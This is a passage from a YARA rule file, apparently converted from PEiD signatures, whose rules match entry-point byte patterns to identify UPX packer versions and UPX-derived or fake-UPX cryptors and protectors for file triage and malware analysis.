83 CD FF 31 DB 5E 8D BE FA FF 57 66 81 87 81 C6 B3 01 EB 0A 8A 06 46 88 07 47 01 DB 75 }\r\n        $b = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 EC 01 ?? ?? 83 CD FF 31 DB EB 07 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v062_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 F0 01 ?? ?? 83 CD FF 31 DB 90 90 90 EB 08 90 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXcrypter_archphaseNWC: PEiD\r\n{\r\n    strings:\r\n        $a = { BF ?? ?? ?? 00 81 FF ?? ?? ?? 00 74 10 81 2F ?? 00 00 00 83 C7 04 BB 05 ?? ?? 00 FF E3 BE ?? ?? ?? 00 FF E6 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_multi_layer_encryption_MANtiCORE_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8A 14 08 80 F2 ?? 88 14 08 41 83 F9 ?? 75 F1 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v103_v104_Modified: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB 8A 07 ?? EB B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VisualUPX_02_emadicius_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 C7 05 ?? ?? ?? 00 75 07 E9 ?? FE FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V200_V3X_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF ?? ?? ?? ?? ?? 
95 8A 07 47 08 C0 74 DC 89 F9 57 48 F2 AE 55 FF ?? ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB E1 FF ?? ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? ?? ?? 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXLock_v11_CyberDoom_Bob: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? 00 60 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v051: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 58 83 E8 3D 50 8D B8 FF 57 8D B0 }\r\n        $b = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 8D B0 D8 01 ?? ?? 83 CD FF 31 DB ?? ?? ?? ?? 01 DB 75 07 8B 1E 83 EE FC 11 DB 73 0B 8A 06 46 88 07 47 EB EB 90 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPXFreak_V01_HMX0101: PEiD\r\n{\r\n    strings:\r\n        $a = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_290_LZMA: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n        $b = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 ?? ?? ?? ?? 90 90 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v0761_pe_exe_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 57 83 ?? ?? 31 DB EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXShit_006_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? 43 00 B9 15 00 00 00 80 34 08 ?? 
E2 FA E9 D6 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_One_layer_encryption_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v103_v104_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB 8A 07 ?? EB B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_062_PE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 66 81 87 00 00 00 00 00 00 8D B0 F0 01 00 00 83 CD FF 31 DB 90 90 90 EB 08 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_v072_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E 8D BE FA ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 81 C6 B3 01 ?? ?? EB 0A ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_UPX_0896_102_105_124_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE 00 90 8B 00 8D BE 00 80 B4 FF 57 83 CD FF EB 3A 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B 75 19 8B 1E 83 EE FC 11 DB 72 10 58 61 90 EB 05 E8 EB 04 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v20_Markus_Laszlo_Reiser_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 
00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 }\r\n        $b = { 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule _PseudoSigner_02_UPX_06: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_121_Markus_Laszlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 31 2E 32 31 00 55 50 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_062_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 58 83 E8 48 50 8D B8 00 00 00 FF 57 66 81 87 00 00 00 00 00 00 8D B0 F8 01 00 00 83 CD FF 31 DB EB 08 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V200_V290_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { FF D5 8D 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 
6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_UPX_06: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Inliner_v10_by_GPcH_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D5 FE FF FF 8B 06 83 F8 00 74 11 8D B5 E1 FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 C7 06 01 00 00 00 8B D5 8B 85 B1 FE FF FF 2B D0 89 95 B1 FE FF FF 01 95 C9 FE FF FF 8D B5 E5 FE FF FF 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_v01_500mhz_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 5D 8B CD 81 ED 7A 29 40 00 89 AD 0F 6D 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_stub: PEiD\r\n{\r\n    strings:\r\n        $a = { 79 07 0F B7 07 47 50 47 B9 57 48 F2 AE 55 FF 96 84 ?? 00 00 09 C0 74 07 89 03 83 C3 04 EB D8 FF 96 88 ?? 00 00 61 E9 ?? ?? ?? FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modifier_v01x_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 50 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_290_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 ?? ?? ?? ?? 90 90 }\r\n        $b = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 
57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v062: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 58 83 E8 3D 50 8D B8 FF 57 66 81 87 8D B0 EC 01 83 CD FF 31 DB EB 07 90 8A 06 46 88 07 47 01 DB 75 }\r\n        $b = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 F0 01 ?? ?? 83 CD FF 31 DB 90 90 90 EB 08 90 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_Modified_Stub_c_Farb_rausch_Consumer_Consulting_: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 E8 00 00 00 00 5B 83 C3 66 A4 FF D3 73 FB 31 C9 FF D3 73 14 31 C0 FF D3 73 1D 41 B0 10 FF D3 10 C0 73 FA 75 3C AA EB E2 E8 4A 00 00 00 49 E2 10 E8 40 00 00 00 EB 28 AC D1 E8 74 45 11 C9 EB 1C 91 48 C1 E0 08 AC E8 2A 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 89 E8 56 89 FE 29 C6 F3 A4 5E EB 9F 00 D2 75 05 8A 16 46 10 D2 C3 31 C9 41 FF D3 11 C9 FF D3 72 F8 C3 31 C0 31 DB 31 C9 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F 0E 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 89 D8 E2 D9 8D BE ?? ?? ?? ?? 8B 07 09 C0 74 45 8B 5F 04 8D 84 30 ?? ?? ?? ?? 01 F3 50 83 C7 08 FF 96 ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 79 07 0F B7 07 47 50 47 B9 57 48 F2 AE 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB D8 FF 96 ?? ?? ?? ?? 61 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_One_layer_encryption_MANtiCORE_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 
00 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_Modified_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_Modified: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB 07 8B 1E 83 EE FC 11 DB 8A 07 EB B8 01 ?? ?? ?? 01 DB 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 }\r\n        $b = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v051_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 F0 01 ?? ?? 83 CD FF 31 DB 90 90 90 EB 08 90 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_001_dj_siba: PEiD\r\n{\r\n    strings:\r\n        $a = { 94 BC ?? ?? 43 00 B9 ?? 00 00 00 80 34 0C ?? E2 FA 94 FF E0 61 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Alternative_stub: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB 07 8B 1E 83 EE FC 11 DB ED B8 01 00 00 00 01 DB 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_293_300_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 03 00 02 00 90 90 90 90 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_One_layer_encryption: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? 
E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v103_v104: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 8A 07 72 EB B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC }\r\n        $b = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 8A 07 72 EB B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_071_072_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 00 00 00 00 00 0E 0E 00 00 00 00 00 00 00 00 00 00 00 CB 55 50 58 21 09 00 02 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Inliner_10_by_GPcH: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D5 FE FF FF 8B 06 83 F8 00 74 11 8D B5 E1 FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 C7 06 01 00 00 00 8B D5 8B 85 B1 FE FF FF 2B D0 89 95 B1 FE FF FF 01 95 C9 FE FF FF 8D B5 E5 FE FF FF 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_02_UPX_06_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_0991_0993_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 00 00 00 00 60 BE B0 00 00 00 8D BE 50 00 00 FF 57 83 CD FF EB 0D 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_DLL: PEiD\r\n{\r\n    
strings:\r\n        $a = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n        $b = { 80 7C 24 08 01 0F 85 ?? ?? ?? 00 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPXLock_v10_CyberDoom_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 60 E8 2B 03 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_122_Markus_Laszlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 31 2E 32 32 00 55 50 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_SCRAMBLER_306_OnToL: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 59 83 C1 07 51 C3 C3 BE ?? ?? ?? ?? 83 EC 04 89 34 24 B9 80 00 00 00 81 36 ?? ?? ?? ?? 50 B8 04 00 00 00 50 03 34 24 58 58 83 E9 03 E2 E9 EB D6 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_082_083_COM: PEiD\r\n{\r\n    strings:\r\n        $a = { 81 FC 00 00 77 02 CD 20 B9 00 00 BE 00 00 BF 00 00 BB 00 80 FD F3 A4 FC 87 F7 83 EE C6 19 ED 57 57 E9 00 00 55 50 58 21 0A 01 04 07 00 00 00 00 00 00 00 00 00 00 00 00 06 00 FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_290_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 ?? ?? ?? ?? 
90 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule SkD_Undetectabler_Pro_20_No_UPX_Method_SkD_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 83 C4 F0 B8 FC 26 00 10 E8 EC F3 FF FF 6A 0F E8 15 F5 FF FF E8 64 FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V200_V300_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { FF D5 8D 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0761_dos_exe: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? BE ?? ?? 89 F7 1E A9 ?? ?? 8C C8 05 ?? ?? 8E D8 05 ?? ?? 8E C0 FD F3 A5 FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_05_snaker: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 83 F9 00 7E 06 80 30 ?? 40 E2 F5 E9 ?? ?? ?? FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_UPX_0896_102_105_124_emadicius_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 64 A0 23 00 00 00 83 C5 06 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXShit_006: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? 43 00 B9 15 00 00 00 80 34 08 ?? 
E2 FA E9 D6 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_070_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 00 00 00 00 00 0E 0E 00 00 00 00 00 00 00 00 00 00 00 CB 55 50 58 21 08 00 02 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_v072_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E 8D BE FA ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 81 C6 B3 01 ?? ?? EB 0A ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v070_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 58 83 ?? ?? 50 8D ?? ?? ?? ?? ?? 57 66 ?? ?? ?? ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 83 ?? ?? 31 DB EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Upx_Lock_10_12_CyberDoom_Team_X_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_V3042005_MANtiCORE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? ?? ?? ?? ?? E2 FA 61 68 ?? ?? ?? ?? C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Upx_v12_Marcus_Lazlo_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 05 A4 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 F2 31 C0 40 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 75 07 8B 1E 83 EE FC 11 DB 73 E6 31 C9 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 ?? ?? ?? 00 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 
57 83 CD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Password_Protector_for_the_UPX_030_g0d: PEiD\r\n{\r\n    strings:\r\n        $a = {}\r\n        $b = { C8 50 01 00 60 E8 EC 00 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 55 53 45 52 33 32 2E 64 6C 6C 00 44 69 61 6C 6F 67 42 6F 78 49 6E 64 69 72 65 63 74 50 61 72 61 6D 41 00 53 65 6E 64 4D 65 73 73 61 67 65 41 00 45 6E 64 44 69 61 6C 6F }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_290_LZMA_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_UPX_06_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 E9 }\r\n    condition:\r\n        $a at 